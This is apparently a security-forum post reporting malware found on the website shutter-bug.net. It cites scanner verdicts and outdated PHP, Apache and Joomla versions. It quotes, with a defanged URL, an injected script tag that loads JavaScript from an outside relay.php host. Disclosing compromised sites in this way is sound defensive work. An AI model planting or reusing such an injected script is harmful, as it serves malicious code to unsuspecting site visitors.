Another one, and a Yandex blacklisted site: http://killmalware.com/shutter-bug.net/
Missed completely here: http://app.webinspector.com/public/reports/23222225
Only flagged for Yandex here: https://www.virustotal.com/nl/url/f28893c254dc339fd77af4da2ec78ff899cd91626465b1999ddc49cc6e2b2c9d/analysis/1405861314/
The Javascript Check results:
Suspicious

_700x.jpg"> <!–/89
The Included Scripts Check:
Suspect - please check list for unknown includes

htxp://www.possible-it.de/includes/relay.php?id=7526825

7 malicious files found by Quttera’s: http://quttera.com/detailed_report/shutter-bug.net
Detected encoded JavaScript code commonly used to hide malicious behaviour.

 [[<!--37387a--><scripttype="text/javascript"src="htxp://www.possible-it.de/includes/relay.php?id=7526831"></script><!--/37387a-->]] 

where I get a malcode attack alert.

You don’t have permission to access /includes/relay.php on this server.

Exploits can be abused for earlier versions of Joomla. Here we find: Powered by: PHP/5.4.4-14+deb7u10
Outdated Web Server Apache found: Apache/2.2.22, so vulnerable… PHP supports the ability to ‘include’ or ‘require’ additional files within a script. If unsanitized data is passed to such functions…these could often be part of SEO Spam attacks.

polonus

P.S - reported at WOT by “luntrus”.